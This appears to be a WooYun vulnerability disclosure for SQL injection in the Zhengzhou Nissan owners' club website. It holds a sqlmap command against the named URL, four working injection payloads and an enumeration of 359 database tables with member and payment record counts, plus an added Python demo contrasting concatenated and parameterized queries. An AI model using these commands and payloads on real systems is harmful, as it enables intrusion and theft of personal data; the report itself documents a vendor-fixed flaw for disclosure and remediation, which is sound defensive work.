
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0154146

Title: Zhengzhou Nissan owners' club SQL injection / 359 tables / 2,000,000 member records / 100,000 transaction records

Affected vendor: 郑州日产汽车有限公司 (Zhengzhou Nissan Automobile Co., Ltd.)

Author: 路人甲

Submitted: 2015-11-18 17:45

Fixed: 2015-11-24 17:10

Published: 2015-11-24 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Fixed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-18: Details sent to the vendor, awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-24: Vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

Detailed description:

sqlmap -u "http://club.zznissan.com.cn/fenbu/album.php?cls=1'%22&keyword=&page=2" --dbms=mysql --tamper=between --level=5 --risk=3


Parameter: cls




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cls
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: cls=-2754' OR (7970=7970) AND 'ABtb'='ABtb&keyword=&page=2
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: cls=-2765' OR (SELECT 7906 FROM(SELECT COUNT(*),CONCAT(0x716a697271,(SELECT (CASE WHEN (7906=7906) THEN 1 ELSE 0 END)),0x716e6a7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EZrq'='EZrq&keyword=&page=2
Type: UNION query
Title: MySQL UNION query (random number) - 11 columns
Payload: cls=-1976' UNION ALL SELECT CONCAT(0x716a697271,0x706a744672674c484469,0x716e6a7371),2675,2675,2675,2675,2675,2675,2675,2675,2675,2675#&keyword=&page=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: cls=-4280' OR 1288=SLEEP(5) AND 'Ydqy'='Ydqy&keyword=&page=2
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'paladinclub'
current user: 'paladinclub@localhost'
available databases [3]:
[*] information_schema
[*] paladinclub
[*] test
Database: paladinclub
[359 tables]
Database: paladinclub
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| memberawoke | 2997714 |
| oneq_missiondata | 1822433 |
| memberpay | 174554 |
| membermodify | 139384 |
| pw_members | 100189 |
| pw_usercache | 87618 |
| pw_members123 | 74523 |
| pw_memberdata | 63917 |
| carinfo | 55829 |
| memberinfo | 51367 |
| pw_ms_messages | 51267 |
| pw_ms_relations | 45781 |
| pw_ms_configs | 39840 |
| pw_merge_posts | 38559 |
| pw_posts | 38559 |
| pw_membersnew | 38251 |
| pw_members0705 | 38249 |
| east2008_loginrecord | 36497 |
| east2008_answer | 32599 |
| pw_msg | 28369 |
| pw_msgc | 28368 |
| pw_memberinfo | 26760 |
| pw_adminlog | 22134 |
| pw_datanalyse | 18747 |
| dakar2006 | 14392 |
| dakar20061 | 14391 |
| dakar20062 | 14091 |
| dakar20063 | 14091 |
| pw_attachs | 13050 |
| fankui | 12826 |
| pw_member_behavior_statistic | 10677 |
| pw_merge_tmsgs | 10531 |
| pw_tmsgs | 10531 |
| pw_threads | 10526 |
| eastgames_notify | 7550 |
| pw_medal_award | 6863 |
| memberinfo_t | 6236 |
| imagefile | 5411 |
| pw_cache_members | 5315 |
| pw_statistics_daily | 5180 |
| east2008_user | 4739 |
| pw_membercredit | 3737 |
| pw_permission | 3736 |
| pw_areas | 3550 |
| pw_ipstates | 3235 |
| pw_school | 2428 |
| article | 2370 |
| pw_wordfb | 2002 |
| pw_ucnotify | 1968 |
| pw_weibo_relations | 1494 |
| pw_filter | 1472 |
| pw_tags | 1442 |
| pw_weibo_content | 1141 |
| pw_forumlog | 1110 |
| oneq_mission | 1105 |
| memberinfo_bak | 1049 |
| pw_elements | 908 |
| membermark | 808 |
| pw_ms_replies | 663 |
| pw_ms_searchs | 658 |
| lmsj | 603 |
| dakar | 537 |
| memberinfo1 | 456 |
| pw_config | 379 |
| pw_attention | 345 |
| pw_activityfield | 340 |
| hk_article | 315 |
| wqw_city | 301 |
| pw_invoke | 300 |
| pw_invokepiece | 246 |
| hk_class | 232 |
| imgcategory | 232 |
| pw_friends | 183 |
| pw_cachedata | 145 |
| pw_recycle | 142 |
| pw_cache | 137 |
| pw_topicfield | 128 |
| czhd_memberinfo | 114 |
| pw_medal_log | 114 |
| pw_smiles | 111 |
| pw_pageinvoke | 110 |
| pw_hack | 99 |
| pw_space | 90 |
| xunlianying | 85 |
| userfun | 70 |
| pw_diary | 69 |
| pw_poststopped | 67 |
| pw_clientorder | 65 |
| pw_cnphoto | 54 |
| category | 52 |
| pw_ouserdata | 51 |
| pw_medal_apply | 48 |
| pw_nav | 46 |
| user_bak | 41 |
| huikan | 36 |
| pw_administrators | 36 |
| pw_report | 36 |
| `user` | 34 |
| pw_draft | 34 |
| pw_tagdata | 33 |
| prov | 31 |
| pw_advert | 31 |
| pw_collection | 31 |
| wqw_prov | 31 |
| pw_pcfield | 30 |
| pw_company | 28 |
| pw_user_career | 28 |
| pw_block | 27 |
| pw_help | 27 |
| clubinfo | 26 |
| pw_cnalbum | 23 |
| pw_membertags_relations | 23 |
| pw_pinglog | 23 |
| east2008_question | 22 |
| pw_rateconfig | 22 |
| pw_write_smiles | 22 |
| pw_forumdata | 21 |
| pw_forums | 21 |
| pw_modehot | 21 |
| pw_tpl | 19 |
| file_flow | 18 |
| pw_medal_info | 18 |
| pw_usergroups | 18 |
| khly_hz | 17 |
| pw_activitymodel | 17 |
| pw_membertags | 17 |
| pw_topictype | 16 |
| pw_voter | 16 |
| pw_searchforum | 15 |
| pw_user_education | 15 |
| file_info | 14 |
| east2008pho_loginrecord | 13 |
| pw_favors | 13 |
| pw_forumsextra | 13 |
| xly_user | 13 |
| pw_tools | 12 |
| pw_customfield | 11 |
| pw_medalslogs | 11 |
| pw_job | 10 |
| pw_medalinfo | 10 |
| pw_overprint | 10 |
| paladin_awards | 9 |
| pw_home | 9 |
| usergroup | 9 |
| pw_plan | 8 |
| pw_styles | 8 |
| pw_topicmodel | 8 |
| pw_cnskin | 7 |
| pw_debateclass | 7 |
| pw_stopicblock | 7 |
| pw_cnlevel | 6 |
| pw_medaluser | 6 |
| pw_polls | 6 |
| pw_stamp | 6 |
| pw_tpltype | 6 |
| cj_jl | 5 |
| pw_actions | 5 |
| pw_banuser | 5 |
| pw_datastore | 5 |
| pw_stopiccategory | 5 |
| pw_topiccate | 5 |
| a_user | 4 |
| file_share | 4 |
| pw_activitycate | 4 |
| pw_adminset | 4 |
| pw_cnclass | 3 |
| pw_cnstyles | 3 |
| pw_kmd_spread | 3 |
| topic | 3 |
| a_customers | 2 |
| a_floor | 2 |
| dakar_config | 2 |
| east2008pho_user | 2 |
| pw_channel | 2 |
| pw_comment | 2 |
| pw_diarytype | 2 |
| pw_forumtype | 2 |
| pw_modules | 2 |
| pw_portalpage | 2 |
| pw_searchstatistic | 2 |
| pw_sharelinkstype | 2 |
| `language` | 1 |
| pw_activity | 1 |
| pw_actmember | 1 |
| pw_bbsinfo | 1 |
| pw_cmembers | 1 |
| pw_colonys | 1 |
| pw_credits | 1 |
| pw_filter_class | 1 |
| pw_friendtype | 1 |
| pw_invitecode | 1 |
| pw_mpageconfig | 1 |
| pw_oboard | 1 |
| pw_pidtmp | 1 |
| pw_postcate | 1 |
| pw_task | 1 |
| pw_toollog | 1 |
+------------------------------+---------+

Proof of vulnerability:

Fix recommendation:

Parameter filtering
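
The fix note above is a single phrase, and the album.php source is not shown on the page. The following is an added example, not code from the page or from the vendor's application: a constructed stand-in for the `cls` lookup that assembles the query by string concatenation, beside the parameterized form and an integer whitelist check, driven with the boolean-based blind payload sqlmap reported above. The table name `album`, its rows and the function names are assumptions. It uses SQLite so it runs offline; the target was MySQL, and the error-based and SLEEP() payloads on the page are MySQL-specific and are not reproduced here.

```python
import re
import sqlite3

# Constructed sample rows standing in for the album class table behind
# album.php; the real schema is not shown on the page.
ROWS = [
    (1, "Club rally 2015"),
    (2, "Member meetup"),
    (3, "Dakar photos"),
]

# Boolean-based blind payload copied verbatim from the sqlmap output above.
# Once the application wraps it in quotes the WHERE clause reads:
#   cls = '-2754' OR (7970=7970) AND 'ABtb'='ABtb'
PAYLOAD = "-2754' OR (7970=7970) AND 'ABtb'='ABtb"


def build_db() -> sqlite3.Connection:
    """In-memory table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE album (cls INTEGER, title TEXT)")
    conn.executemany("INSERT INTO album VALUES (?, ?)", ROWS)
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, cls: str) -> list:
    """The bug class behind the report: the query is built by concatenation,
    so a quote in `cls` closes the literal and the rest of the value is
    parsed as SQL. AND binds tighter than OR, so the clause becomes
    (cls = '-2754') OR ((7970=7970) AND ('ABtb'='ABtb')), which is always
    true, and every row comes back."""
    sql = "SELECT cls, title FROM album WHERE cls = '" + cls + "' ORDER BY cls"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, cls) -> list:
    """Hardened form: a bound parameter is sent as a value and never parsed
    as SQL, so the payload is compared as one literal string and matches
    nothing."""
    sql = "SELECT cls, title FROM album WHERE cls = ? ORDER BY cls"
    return conn.execute(sql, (cls,)).fetchall()


def parse_cls(raw: str) -> int:
    """Defence in depth: `cls` is a class id, so accept only a plain decimal
    integer before the value reaches the database layer at all."""
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("cls must be a decimal integer, got %r" % raw)
    return int(raw)


def demo() -> dict:
    """Run the three cases and return the rows each one yields."""
    conn = build_db()
    return {
        "vulnerable": vulnerable_lookup(conn, PAYLOAD),  # all three rows leak
        "safe": safe_lookup(conn, PAYLOAD),              # no rows
        "legit": safe_lookup(conn, parse_cls("1")),      # the one real class
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-10s %s" % (name, rows))
```

The bound parameter is the actual fix; the integer check is the "parameter filtering" the report asks for and is worth keeping as a second layer, but on its own it only works because `cls` happens to be numeric, which is not true of `keyword` on the same endpoint.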

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-11-20 11:16

Vendor reply:

Vulnerability received, thank you!

Latest status:

2015-11-24: This system was already deprecated and has been taken offline.



Vulnerability rating:

Comments

  1. 2015-11-19 01:03 | 我不是冰冰 ( Regular white hat | Rank:125 Vulnerabilities:34 | Never give up hope, not even at the last moment )

    What a coincidence